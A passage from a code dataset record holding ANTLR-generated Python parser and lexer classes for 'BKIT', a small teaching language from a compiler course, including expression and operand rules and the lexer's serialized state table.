143\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,12,self._ctx)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.unrollRecursionContexts(_parentctx)\n return localctx\n\n\n class SubexprContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def LEFT_PAREN(self):\n return self.getToken(BKITParser.LEFT_PAREN, 0)\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def RIGHT_PAREN(self):\n return self.getToken(BKITParser.RIGHT_PAREN, 0)\n\n def getRuleIndex(self):\n 
return BKITParser.RULE_subexpr\n\n\n\n\n def subexpr(self):\n\n localctx = BKITParser.SubexprContext(self, self._ctx, self.state)\n self.enterRule(localctx, 28, self.RULE_subexpr)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 144\n self.match(BKITParser.LEFT_PAREN)\n self.state = 145\n self.expr()\n self.state = 146\n self.match(BKITParser.RIGHT_PAREN)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class OperandContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def Integer_literal(self):\n return self.getToken(BKITParser.Integer_literal, 0)\n\n def Float_literal(self):\n return self.getToken(BKITParser.Float_literal, 0)\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def call_stmt(self):\n return self.getTypedRuleContext(BKITParser.Call_stmtContext,0)\n\n\n def subexpr(self):\n return self.getTypedRuleContext(BKITParser.SubexprContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_operand\n\n\n\n\n def operand(self):\n\n localctx = BKITParser.OperandContext(self, self._ctx, self.state)\n self.enterRule(localctx, 30, self.RULE_operand)\n try:\n self.state = 153\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,13,self._ctx)\n if la_ == 1:\n self.enterOuterAlt(localctx, 1)\n self.state = 148\n self.match(BKITParser.Integer_literal)\n pass\n\n elif la_ == 2:\n self.enterOuterAlt(localctx, 2)\n self.state = 149\n self.match(BKITParser.Float_literal)\n pass\n\n elif la_ == 3:\n self.enterOuterAlt(localctx, 3)\n self.state = 150\n self.match(BKITParser.ID)\n pass\n\n elif la_ == 4:\n self.enterOuterAlt(localctx, 4)\n self.state = 151\n self.call_stmt()\n pass\n\n elif la_ == 5:\n self.enterOuterAlt(localctx, 5)\n self.state = 152\n 
self.subexpr()\n pass\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Ids_listContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ID(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.ID)\n else:\n return self.getToken(BKITParser.ID, i)\n\n def COMMA(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.COMMA)\n else:\n return self.getToken(BKITParser.COMMA, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_ids_list\n\n\n\n\n def ids_list(self):\n\n localctx = BKITParser.Ids_listContext(self, self._ctx, self.state)\n self.enterRule(localctx, 32, self.RULE_ids_list)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 155\n self.match(BKITParser.ID)\n self.state = 160\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.COMMA:\n self.state = 156\n self.match(BKITParser.COMMA)\n self.state = 157\n self.match(BKITParser.ID)\n self.state = 162\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Primitive_typeContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def INT(self):\n return self.getToken(BKITParser.INT, 0)\n\n def FLOAT(self):\n return self.getToken(BKITParser.FLOAT, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_primitive_type\n\n\n\n\n def primitive_type(self):\n\n localctx = BKITParser.Primitive_typeContext(self, self._ctx, self.state)\n 
self.enterRule(localctx, 34, self.RULE_primitive_type)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 163\n _la = self._input.LA(1)\n if not(_la==BKITParser.INT or _la==BKITParser.FLOAT):\n self._errHandler.recoverInline(self)\n else:\n self._errHandler.reportMatch(self)\n self.consume()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n\n def sempred(self, localctx:RuleContext, ruleIndex:int, predIndex:int):\n if self._predicates == None:\n self._predicates = dict()\n self._predicates[9] = self.exprs_list_sempred\n self._predicates[12] = self.expr1_sempred\n self._predicates[13] = self.expr2_sempred\n pred = self._predicates.get(ruleIndex, None)\n if pred is None:\n raise Exception(\"No predicate with index:\" + str(ruleIndex))\n else:\n return pred(localctx, predIndex)\n\n def exprs_list_sempred(self, localctx:Exprs_listContext, predIndex:int):\n if predIndex == 0:\n return self.precpred(self._ctx, 1)\n \n\n def expr1_sempred(self, localctx:Expr1Context, predIndex:int):\n if predIndex == 1:\n return self.precpred(self._ctx, 2)\n \n\n def expr2_sempred(self, localctx:Expr2Context, predIndex:int):\n if predIndex == 2:\n return self.precpred(self._ctx, 3)\n \n\n if predIndex == 3:\n return self.precpred(self._ctx, 2)\n \n\n\n\n\n" }, { "alpha_fraction": 0.3158814609050751, "alphanum_fraction": 0.5556409955024719, "avg_line_length": 53.507633209228516, "blob_id": "e47c6e7359a3d971f5d117aba4891748024d473c", "content_id": "e81176c84f7bb84c36738be97e6c3e6403275c80", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14306, "license_type": "no_license", "max_line_length": 107, "num_lines": 262, "path": "/SyntaxAnalysis/tut/src/forJava/.antlr/BKITLexer.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "# Generated from 
/home/nguyendat/Documents/projects/PPL/SyntaxAnalysis/tut/src/forJava/BKIT.g4 by ANTLR 4.8\nfrom antlr4 import *\nfrom io import StringIO\nfrom typing.io import TextIO\nimport sys\n\n\nfrom lexererr import *\n\n\n\ndef serializedATN():\n with StringIO() as buf:\n buf.write(\"\\3\\u608b\\ua72a\\u8133\\ub9ed\\u417c\\u3be7\\u7786\\u5964\\2\\36\")\n buf.write(\"\\u012d\\b\\1\\4\\2\\t\\2\\4\\3\\t\\3\\4\\4\\t\\4\\4\\5\\t\\5\\4\\6\\t\\6\\4\\7\")\n buf.write(\"\\t\\7\\4\\b\\t\\b\\4\\t\\t\\t\\4\\n\\t\\n\\4\\13\\t\\13\\4\\f\\t\\f\\4\\r\\t\\r\")\n buf.write(\"\\4\\16\\t\\16\\4\\17\\t\\17\\4\\20\\t\\20\\4\\21\\t\\21\\4\\22\\t\\22\\4\\23\")\n buf.write(\"\\t\\23\\4\\24\\t\\24\\4\\25\\t\\25\\4\\26\\t\\26\\4\\27\\t\\27\\4\\30\\t\\30\")\n buf.write(\"\\4\\31\\t\\31\\4\\32\\t\\32\\4\\33\\t\\33\\4\\34\\t\\34\\4\\35\\t\\35\\4\\36\")\n buf.write(\"\\t\\36\\4\\37\\t\\37\\4 \\t \\4!\\t!\\4\\\"\\t\\\"\\4#\\t#\\4$\\t$\\4%\\t%\")\n buf.write(\"\\4&\\t&\\4\\'\\t\\'\\4(\\t(\\4)\\t)\\4*\\t*\\4+\\t+\\4,\\t,\\4-\\t-\\3\\2\")\n buf.write(\"\\3\\2\\3\\2\\7\\2_\\n\\2\\f\\2\\16\\2b\\13\\2\\3\\3\\3\\3\\7\\3f\\n\\3\\f\\3\")\n buf.write(\"\\16\\3i\\13\\3\\3\\3\\3\\3\\3\\4\\3\\4\\7\\4o\\n\\4\\f\\4\\16\\4r\\13\\4\\3\")\n buf.write(\"\\4\\5\\4u\\n\\4\\3\\4\\3\\4\\3\\5\\3\\5\\3\\5\\3\\5\\7\\5}\\n\\5\\f\\5\\16\\5\")\n buf.write(\"\\u0080\\13\\5\\3\\5\\3\\5\\3\\5\\3\\5\\3\\5\\3\\6\\3\\6\\3\\6\\3\\6\\7\\6\\u008b\")\n buf.write(\"\\n\\6\\f\\6\\16\\6\\u008e\\13\\6\\3\\6\\3\\6\\3\\7\\3\\7\\3\\b\\6\\b\\u0095\")\n buf.write(\"\\n\\b\\r\\b\\16\\b\\u0096\\3\\b\\3\\b\\3\\t\\3\\t\\3\\n\\3\\n\\3\\13\\3\\13\")\n buf.write(\"\\3\\f\\3\\f\\5\\f\\u00a3\\n\\f\\3\\r\\3\\r\\5\\r\\u00a7\\n\\r\\3\\r\\6\\r\\u00aa\")\n buf.write(\"\\n\\r\\r\\r\\16\\r\\u00ab\\3\\16\\3\\16\\7\\16\\u00b0\\n\\16\\f\\16\\16\")\n buf.write(\"\\16\\u00b3\\13\\16\\3\\17\\6\\17\\u00b6\\n\\17\\r\\17\\16\\17\\u00b7\")\n buf.write(\"\\3\\17\\3\\17\\5\\17\\u00bc\\n\\17\\3\\17\\5\\17\\u00bf\\n\\17\\3\\20\\3\")\n 
buf.write(\"\\20\\3\\20\\3\\21\\3\\21\\3\\21\\3\\22\\3\\22\\3\\22\\3\\23\\3\\23\\3\\23\")\n buf.write(\"\\5\\23\\u00cd\\n\\23\\3\\24\\3\\24\\3\\25\\3\\25\\3\\26\\3\\26\\3\\26\\3\")\n buf.write(\"\\26\\5\\26\\u00d7\\n\\26\\3\\26\\6\\26\\u00da\\n\\26\\r\\26\\16\\26\\u00db\")\n buf.write(\"\\3\\27\\6\\27\\u00df\\n\\27\\r\\27\\16\\27\\u00e0\\3\\30\\3\\30\\3\\30\")\n buf.write(\"\\3\\30\\5\\30\\u00e7\\n\\30\\3\\30\\6\\30\\u00ea\\n\\30\\r\\30\\16\\30\")\n buf.write(\"\\u00eb\\3\\31\\3\\31\\3\\31\\5\\31\\u00f1\\n\\31\\3\\32\\3\\32\\3\\33\\3\")\n buf.write(\"\\33\\7\\33\\u00f7\\n\\33\\f\\33\\16\\33\\u00fa\\13\\33\\3\\33\\3\\33\\3\")\n buf.write(\"\\33\\3\\34\\3\\34\\3\\34\\3\\34\\3\\34\\3\\34\\3\\34\\3\\35\\3\\35\\3\\35\")\n buf.write(\"\\3\\35\\3\\36\\3\\36\\3\\36\\3\\36\\3\\36\\3\\36\\3\\37\\3\\37\\3 \\3 \\3\")\n buf.write(\"!\\3!\\3\\\"\\3\\\"\\3#\\3#\\3$\\3$\\3%\\3%\\3&\\3&\\3\\'\\3\\'\\3(\\3(\\3)\")\n buf.write(\"\\3)\\3*\\3*\\3+\\3+\\3,\\3,\\3-\\3-\\4~\\u008c\\2.\\3\\3\\5\\4\\7\\5\\t\")\n buf.write(\"\\6\\13\\7\\r\\b\\17\\t\\21\\2\\23\\2\\25\\2\\27\\2\\31\\2\\33\\2\\35\\2\\37\")\n buf.write(\"\\2!\\2#\\2%\\2\\'\\2)\\2+\\2-\\2/\\2\\61\\n\\63\\13\\65\\f\\67\\r9\\16;\")\n buf.write(\"\\17=\\20?\\21A\\22C\\23E\\24G\\25I\\26K\\27M\\30O\\31Q\\32S\\33U\\34\")\n buf.write(\"W\\35Y\\36\\3\\2\\16\\4\\3\\n\\f\\16\\17\\4\\2\\60\\60AA\\5\\2\\13\\f\\16\")\n buf.write(\"\\17\\\"\\\"\\3\\2c|\\3\\2C\\\\\\3\\2\\62;\\4\\2GGgg\\3\\2\\60\\60\\t\\2))^\")\n buf.write(\"^ddhhppttvv\\7\\2\\n\\f\\16\\17$$))^^\\5\\2\\62;CHch\\3\\2\\629\\2\")\n buf.write(\"\\u0134\\2\\3\\3\\2\\2\\2\\2\\5\\3\\2\\2\\2\\2\\7\\3\\2\\2\\2\\2\\t\\3\\2\\2\\2\")\n buf.write(\"\\2\\13\\3\\2\\2\\2\\2\\r\\3\\2\\2\\2\\2\\17\\3\\2\\2\\2\\2\\61\\3\\2\\2\\2\\2\")\n buf.write(\"\\63\\3\\2\\2\\2\\2\\65\\3\\2\\2\\2\\2\\67\\3\\2\\2\\2\\29\\3\\2\\2\\2\\2;\\3\")\n buf.write(\"\\2\\2\\2\\2=\\3\\2\\2\\2\\2?\\3\\2\\2\\2\\2A\\3\\2\\2\\2\\2C\\3\\2\\2\\2\\2E\")\n 
buf.write(\"\\3\\2\\2\\2\\2G\\3\\2\\2\\2\\2I\\3\\2\\2\\2\\2K\\3\\2\\2\\2\\2M\\3\\2\\2\\2\\2\")\n buf.write(\"O\\3\\2\\2\\2\\2Q\\3\\2\\2\\2\\2S\\3\\2\\2\\2\\2U\\3\\2\\2\\2\\2W\\3\\2\\2\\2\")\n buf.write(\"\\2Y\\3\\2\\2\\2\\3[\\3\\2\\2\\2\\5c\\3\\2\\2\\2\\7l\\3\\2\\2\\2\\tx\\3\\2\\2\")\n buf.write(\"\\2\\13\\u0086\\3\\2\\2\\2\\r\\u0091\\3\\2\\2\\2\\17\\u0094\\3\\2\\2\\2\\21\")\n buf.write(\"\\u009a\\3\\2\\2\\2\\23\\u009c\\3\\2\\2\\2\\25\\u009e\\3\\2\\2\\2\\27\\u00a2\")\n buf.write(\"\\3\\2\\2\\2\\31\\u00a4\\3\\2\\2\\2\\33\\u00ad\\3\\2\\2\\2\\35\\u00b5\\3\")\n buf.write(\"\\2\\2\\2\\37\\u00c0\\3\\2\\2\\2!\\u00c3\\3\\2\\2\\2#\\u00c6\\3\\2\\2\\2\")\n buf.write(\"%\\u00cc\\3\\2\\2\\2\\'\\u00ce\\3\\2\\2\\2)\\u00d0\\3\\2\\2\\2+\\u00d6\")\n buf.write(\"\\3\\2\\2\\2-\\u00de\\3\\2\\2\\2/\\u00e6\\3\\2\\2\\2\\61\\u00f0\\3\\2\\2\")\n buf.write(\"\\2\\63\\u00f2\\3\\2\\2\\2\\65\\u00f4\\3\\2\\2\\2\\67\\u00fe\\3\\2\\2\\2\")\n buf.write(\"9\\u0105\\3\\2\\2\\2;\\u0109\\3\\2\\2\\2=\\u010f\\3\\2\\2\\2?\\u0111\\3\")\n buf.write(\"\\2\\2\\2A\\u0113\\3\\2\\2\\2C\\u0115\\3\\2\\2\\2E\\u0117\\3\\2\\2\\2G\\u0119\")\n buf.write(\"\\3\\2\\2\\2I\\u011b\\3\\2\\2\\2K\\u011d\\3\\2\\2\\2M\\u011f\\3\\2\\2\\2\")\n buf.write(\"O\\u0121\\3\\2\\2\\2Q\\u0123\\3\\2\\2\\2S\\u0125\\3\\2\\2\\2U\\u0127\\3\")\n buf.write(\"\\2\\2\\2W\\u0129\\3\\2\\2\\2Y\\u012b\\3\\2\\2\\2[`\\5\\21\\t\\2\\\\_\\5\\21\")\n buf.write(\"\\t\\2]_\\5\\25\\13\\2^\\\\\\3\\2\\2\\2^]\\3\\2\\2\\2_b\\3\\2\\2\\2`^\\3\\2\")\n buf.write(\"\\2\\2`a\\3\\2\\2\\2a\\4\\3\\2\\2\\2b`\\3\\2\\2\\2cg\\7$\\2\\2df\\5%\\23\\2\")\n buf.write(\"ed\\3\\2\\2\\2fi\\3\\2\\2\\2ge\\3\\2\\2\\2gh\\3\\2\\2\\2hj\\3\\2\\2\\2ig\\3\")\n buf.write(\"\\2\\2\\2jk\\5\\37\\20\\2k\\6\\3\\2\\2\\2lp\\7$\\2\\2mo\\5%\\23\\2nm\\3\\2\")\n buf.write(\"\\2\\2or\\3\\2\\2\\2pn\\3\\2\\2\\2pq\\3\\2\\2\\2qt\\3\\2\\2\\2rp\\3\\2\\2\\2\")\n buf.write(\"su\\t\\2\\2\\2ts\\3\\2\\2\\2uv\\3\\2\\2\\2vw\\b\\4\\2\\2w\\b\\3\\2\\2\\2xy\")\n 
buf.write(\"\\7,\\2\\2yz\\7,\\2\\2z~\\3\\2\\2\\2{}\\13\\2\\2\\2|{\\3\\2\\2\\2}\\u0080\")\n buf.write(\"\\3\\2\\2\\2~\\177\\3\\2\\2\\2~|\\3\\2\\2\\2\\177\\u0081\\3\\2\\2\\2\\u0080\")\n buf.write(\"~\\3\\2\\2\\2\\u0081\\u0082\\7,\\2\\2\\u0082\\u0083\\7,\\2\\2\\u0083\")\n buf.write(\"\\u0084\\3\\2\\2\\2\\u0084\\u0085\\b\\5\\3\\2\\u0085\\n\\3\\2\\2\\2\\u0086\")\n buf.write(\"\\u0087\\7,\\2\\2\\u0087\\u0088\\7,\\2\\2\\u0088\\u008c\\3\\2\\2\\2\\u0089\")\n buf.write(\"\\u008b\\13\\2\\2\\2\\u008a\\u0089\\3\\2\\2\\2\\u008b\\u008e\\3\\2\\2\")\n buf.write(\"\\2\\u008c\\u008d\\3\\2\\2\\2\\u008c\\u008a\\3\\2\\2\\2\\u008d\\u008f\")\n buf.write(\"\\3\\2\\2\\2\\u008e\\u008c\\3\\2\\2\\2\\u008f\\u0090\\7\\2\\2\\3\\u0090\")\n buf.write(\"\\f\\3\\2\\2\\2\\u0091\\u0092\\t\\3\\2\\2\\u0092\\16\\3\\2\\2\\2\\u0093\")\n buf.write(\"\\u0095\\t\\4\\2\\2\\u0094\\u0093\\3\\2\\2\\2\\u0095\\u0096\\3\\2\\2\\2\")\n buf.write(\"\\u0096\\u0094\\3\\2\\2\\2\\u0096\\u0097\\3\\2\\2\\2\\u0097\\u0098\\3\")\n buf.write(\"\\2\\2\\2\\u0098\\u0099\\b\\b\\3\\2\\u0099\\20\\3\\2\\2\\2\\u009a\\u009b\")\n buf.write(\"\\t\\5\\2\\2\\u009b\\22\\3\\2\\2\\2\\u009c\\u009d\\t\\6\\2\\2\\u009d\\24\")\n buf.write(\"\\3\\2\\2\\2\\u009e\\u009f\\t\\7\\2\\2\\u009f\\26\\3\\2\\2\\2\\u00a0\\u00a3\")\n buf.write(\"\\5\\21\\t\\2\\u00a1\\u00a3\\5\\23\\n\\2\\u00a2\\u00a0\\3\\2\\2\\2\\u00a2\")\n buf.write(\"\\u00a1\\3\\2\\2\\2\\u00a3\\30\\3\\2\\2\\2\\u00a4\\u00a6\\t\\b\\2\\2\\u00a5\")\n buf.write(\"\\u00a7\\5? 
\\2\\u00a6\\u00a5\\3\\2\\2\\2\\u00a6\\u00a7\\3\\2\\2\\2\\u00a7\")\n buf.write(\"\\u00a9\\3\\2\\2\\2\\u00a8\\u00aa\\5\\25\\13\\2\\u00a9\\u00a8\\3\\2\\2\")\n buf.write(\"\\2\\u00aa\\u00ab\\3\\2\\2\\2\\u00ab\\u00a9\\3\\2\\2\\2\\u00ab\\u00ac\")\n buf.write(\"\\3\\2\\2\\2\\u00ac\\32\\3\\2\\2\\2\\u00ad\\u00b1\\t\\t\\2\\2\\u00ae\\u00b0\")\n buf.write(\"\\5\\25\\13\\2\\u00af\\u00ae\\3\\2\\2\\2\\u00b0\\u00b3\\3\\2\\2\\2\\u00b1\")\n buf.write(\"\\u00af\\3\\2\\2\\2\\u00b1\\u00b2\\3\\2\\2\\2\\u00b2\\34\\3\\2\\2\\2\\u00b3\")\n buf.write(\"\\u00b1\\3\\2\\2\\2\\u00b4\\u00b6\\5\\25\\13\\2\\u00b5\\u00b4\\3\\2\\2\")\n buf.write(\"\\2\\u00b6\\u00b7\\3\\2\\2\\2\\u00b7\\u00b5\\3\\2\\2\\2\\u00b7\\u00b8\")\n buf.write(\"\\3\\2\\2\\2\\u00b8\\u00be\\3\\2\\2\\2\\u00b9\\u00bb\\5\\33\\16\\2\\u00ba\")\n buf.write(\"\\u00bc\\5\\31\\r\\2\\u00bb\\u00ba\\3\\2\\2\\2\\u00bb\\u00bc\\3\\2\\2\")\n buf.write(\"\\2\\u00bc\\u00bf\\3\\2\\2\\2\\u00bd\\u00bf\\5\\31\\r\\2\\u00be\\u00b9\")\n buf.write(\"\\3\\2\\2\\2\\u00be\\u00bd\\3\\2\\2\\2\\u00bf\\36\\3\\2\\2\\2\\u00c0\\u00c1\")\n buf.write(\"\\7^\\2\\2\\u00c1\\u00c2\\n\\n\\2\\2\\u00c2 \\3\\2\\2\\2\\u00c3\\u00c4\")\n buf.write(\"\\7^\\2\\2\\u00c4\\u00c5\\t\\n\\2\\2\\u00c5\\\"\\3\\2\\2\\2\\u00c6\\u00c7\")\n buf.write(\"\\7)\\2\\2\\u00c7\\u00c8\\7$\\2\\2\\u00c8$\\3\\2\\2\\2\\u00c9\\u00cd\")\n buf.write(\"\\n\\13\\2\\2\\u00ca\\u00cd\\5!\\21\\2\\u00cb\\u00cd\\5#\\22\\2\\u00cc\")\n buf.write(\"\\u00c9\\3\\2\\2\\2\\u00cc\\u00ca\\3\\2\\2\\2\\u00cc\\u00cb\\3\\2\\2\\2\")\n buf.write(\"\\u00cd&\\3\\2\\2\\2\\u00ce\\u00cf\\t\\f\\2\\2\\u00cf(\\3\\2\\2\\2\\u00d0\")\n buf.write(\"\\u00d1\\t\\r\\2\\2\\u00d1*\\3\\2\\2\\2\\u00d2\\u00d3\\7\\62\\2\\2\\u00d3\")\n buf.write(\"\\u00d7\\7z\\2\\2\\u00d4\\u00d5\\7\\62\\2\\2\\u00d5\\u00d7\\7Z\\2\\2\")\n buf.write(\"\\u00d6\\u00d2\\3\\2\\2\\2\\u00d6\\u00d4\\3\\2\\2\\2\\u00d7\\u00d9\\3\")\n buf.write(\"\\2\\2\\2\\u00d8\\u00da\\5\\'\\24\\2\\u00d9\\u00d8\\3\\2\\2\\2\\u00da\")\n 
buf.write(\"\\u00db\\3\\2\\2\\2\\u00db\\u00d9\\3\\2\\2\\2\\u00db\\u00dc\\3\\2\\2\\2\")\n buf.write(\"\\u00dc,\\3\\2\\2\\2\\u00dd\\u00df\\5\\25\\13\\2\\u00de\\u00dd\\3\\2\")\n buf.write(\"\\2\\2\\u00df\\u00e0\\3\\2\\2\\2\\u00e0\\u00de\\3\\2\\2\\2\\u00e0\\u00e1\")\n buf.write(\"\\3\\2\\2\\2\\u00e1.\\3\\2\\2\\2\\u00e2\\u00e3\\7\\62\\2\\2\\u00e3\\u00e7\")\n buf.write(\"\\7q\\2\\2\\u00e4\\u00e5\\7\\62\\2\\2\\u00e5\\u00e7\\7Q\\2\\2\\u00e6\")\n buf.write(\"\\u00e2\\3\\2\\2\\2\\u00e6\\u00e4\\3\\2\\2\\2\\u00e7\\u00e9\\3\\2\\2\\2\")\n buf.write(\"\\u00e8\\u00ea\\5)\\25\\2\\u00e9\\u00e8\\3\\2\\2\\2\\u00ea\\u00eb\\3\")\n buf.write(\"\\2\\2\\2\\u00eb\\u00e9\\3\\2\\2\\2\\u00eb\\u00ec\\3\\2\\2\\2\\u00ec\\60\")\n buf.write(\"\\3\\2\\2\\2\\u00ed\\u00f1\\5-\\27\\2\\u00ee\\u00f1\\5+\\26\\2\\u00ef\")\n buf.write(\"\\u00f1\\5/\\30\\2\\u00f0\\u00ed\\3\\2\\2\\2\\u00f0\\u00ee\\3\\2\\2\\2\")\n buf.write(\"\\u00f0\\u00ef\\3\\2\\2\\2\\u00f1\\62\\3\\2\\2\\2\\u00f2\\u00f3\\5\\35\")\n buf.write(\"\\17\\2\\u00f3\\64\\3\\2\\2\\2\\u00f4\\u00f8\\7$\\2\\2\\u00f5\\u00f7\")\n buf.write(\"\\5%\\23\\2\\u00f6\\u00f5\\3\\2\\2\\2\\u00f7\\u00fa\\3\\2\\2\\2\\u00f8\")\n buf.write(\"\\u00f6\\3\\2\\2\\2\\u00f8\\u00f9\\3\\2\\2\\2\\u00f9\\u00fb\\3\\2\\2\\2\")\n buf.write(\"\\u00fa\\u00f8\\3\\2\\2\\2\\u00fb\\u00fc\\7$\\2\\2\\u00fc\\u00fd\\b\")\n buf.write(\"\\33\\4\\2\\u00fd\\66\\3\\2\\2\\2\\u00fe\\u00ff\\7t\\2\\2\\u00ff\\u0100\")\n buf.write(\"\\7g\\2\\2\\u0100\\u0101\\7v\\2\\2\\u0101\\u0102\\7w\\2\\2\\u0102\\u0103\")\n buf.write(\"\\7t\\2\\2\\u0103\\u0104\\7p\\2\\2\\u01048\\3\\2\\2\\2\\u0105\\u0106\")\n buf.write(\"\\7k\\2\\2\\u0106\\u0107\\7p\\2\\2\\u0107\\u0108\\7v\\2\\2\\u0108:\\3\")\n buf.write(\"\\2\\2\\2\\u0109\\u010a\\7h\\2\\2\\u010a\\u010b\\7n\\2\\2\\u010b\\u010c\")\n buf.write(\"\\7q\\2\\2\\u010c\\u010d\\7c\\2\\2\\u010d\\u010e\\7v\\2\\2\\u010e<\\3\")\n buf.write(\"\\2\\2\\2\\u010f\\u0110\\7-\\2\\2\\u0110>\\3\\2\\2\\2\\u0111\\u0112\\7\")\n 
buf.write(\"/\\2\\2\\u0112@\\3\\2\\2\\2\\u0113\\u0114\\7,\\2\\2\\u0114B\\3\\2\\2\\2\")\n buf.write(\"\\u0115\\u0116\\7\\61\\2\\2\\u0116D\\3\\2\\2\\2\\u0117\\u0118\\7*\\2\")\n buf.write(\"\\2\\u0118F\\3\\2\\2\\2\\u0119\\u011a\\7+\\2\\2\\u011aH\\3\\2\\2\\2\\u011b\")\n buf.write(\"\\u011c\\7]\\2\\2\\u011cJ\\3\\2\\2\\2\\u011d\\u011e\\7_\\2\\2\\u011e\")\n buf.write(\"L\\3\\2\\2\\2\\u011f\\u0120\\7}\\2\\2\\u0120N\\3\\2\\2\\2\\u0121\\u0122\")\n buf.write(\"\\7\\177\\2\\2\\u0122P\\3\\2\\2\\2\\u0123\\u0124\\7<\\2\\2\\u0124R\\3\")\n buf.write(\"\\2\\2\\2\\u0125\\u0126\\7\\60\\2\\2\\u0126T\\3\\2\\2\\2\\u0127\\u0128\")\n buf.write(\"\\7=\\2\\2\\u0128V\\3\\2\\2\\2\\u0129\\u012a\\7.\\2\\2\\u012aX\\3\\2\\2\")\n buf.write(\"\\2\\u012b\\u012c\\7?\\2\\2\\u012cZ\\3\\2\\2\\2\\32\\2^`gpt~\\u008c\")\n buf.write(\"\\u0096\\u00a2\\u00a6\\u00ab\\u00b1\\u00b7\\u00bb\\u00be\\u00cc\")\n buf.write(\"\\u00d6\\u00db\\u00e0\\u00e6\\u00eb\\u00f0\\u00f8\\5\\3\\4\\2\\b\\2\")\n buf.write(\"\\2\\3\\33\\3\")\n return buf.getvalue()\n\n\nclass BKITLexer(Lexer):\n\n atn = ATNDeserializer().deserialize(serializedATN())\n\n decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]\n\n ID = 1\n ILLEGAL_ESCAPE = 2\n UNCLOSE_STRING = 3\n COMMENT = 4\n UNTERMINATED_COMMENT = 5\n ERROR_CHAR = 6\n WS = 7\n Integer_literal = 8\n Float_literal = 9\n String_literal = 10\n RETURN = 11\n INT = 12\n FLOAT = 13\n PLUS_INT = 14\n MINUS_INT = 15\n STAR_INT = 16\n DIV_INT = 17\n LEFT_PAREN = 18\n RIGHT_PAREN = 19\n LEFT_BRACKET = 20\n RIGHT_BRACKET = 21\n LEFT_BRACE = 22\n RIGHT_BRACE = 23\n COLON = 24\n DOT = 25\n SEMI = 26\n COMMA = 27\n ASSIGN = 28\n\n channelNames = [ u\"DEFAULT_TOKEN_CHANNEL\", u\"HIDDEN\" ]\n\n modeNames = [ \"DEFAULT_MODE\" ]\n\n literalNames = [ \"<INVALID>\",\n \"'return'\", \"'int'\", \"'float'\", \"'+'\", \"'-'\", \"'*'\", \"'/'\", \n \"'('\", \"')'\", \"'['\", \"']'\", \"'{'\", \"'}'\", \"':'\", \"'.'\", \"';'\", \n \"','\", \"'='\" ]\n\n symbolicNames = [ \"<INVALID>\",\n 
\"ID\", \"ILLEGAL_ESCAPE\", \"UNCLOSE_STRING\", \"COMMENT\", \"UNTERMINATED_COMMENT\", \n \"ERROR_CHAR\", \"WS\", \"Integer_literal\", \"Float_literal\", \"String_literal\", \n \"RETURN\", \"INT\", \"FLOAT\", \"PLUS_INT\", \"MINUS_INT\", \"STAR_INT\", \n \"DIV_INT\", \"LEFT_PAREN\", \"RIGHT_PAREN\", \"LEFT_BRACKET\", \"RIGHT_BRACKET\", \n \"LEFT_BRACE\", \"RIGHT_BRACE\", \"COLON\", \"DOT\", \"SEMI\", \"COMMA\", \n \"ASSIGN\" ]\n\n ruleNames = [ \"ID\", \"ILLEGAL_ESCAPE\", \"UNCLOSE_STRING\", \"COMMENT\", \"UNTERMINATED_COMMENT\", \n \"ERROR_CHAR\", \"WS\", \"LOWERCASE_LETTER\", \"UPPERCASE_LETTER\", \n \"DIGIT\", \"LETTER\", \"SCIENTIFIC\", \"DECIMAL_POINT\", \"FLOATING_POINT_NUM\", \n \"ILL_ESC_SEQUENCE\", \"SUP_ESC_SEQUENCE\", \"DOUBLE_QUOTE_IN_STRING\", \n \"STRING_CHAR\", \"HEXADECIMALDIGIT\", \"OCTALDIGIT\", \"HEXADECIMAL\", \n \"DECIMAL\", \"OCTAL\", \"Integer_literal\", \"Float_literal\", \n \"String_literal\", \"RETURN\", \"INT\", \"FLOAT\", \"PLUS_INT\", \n \"MINUS_INT\", \"STAR_INT\", \"DIV_INT\", \"LEFT_PAREN\", \"RIGHT_PAREN\", \n \"LEFT_BRACKET\", \"RIGHT_BRACKET\", \"LEFT_BRACE\", \"RIGHT_BRACE\", \n \"COLON\", \"DOT\", \"SEMI\", \"COMMA\", 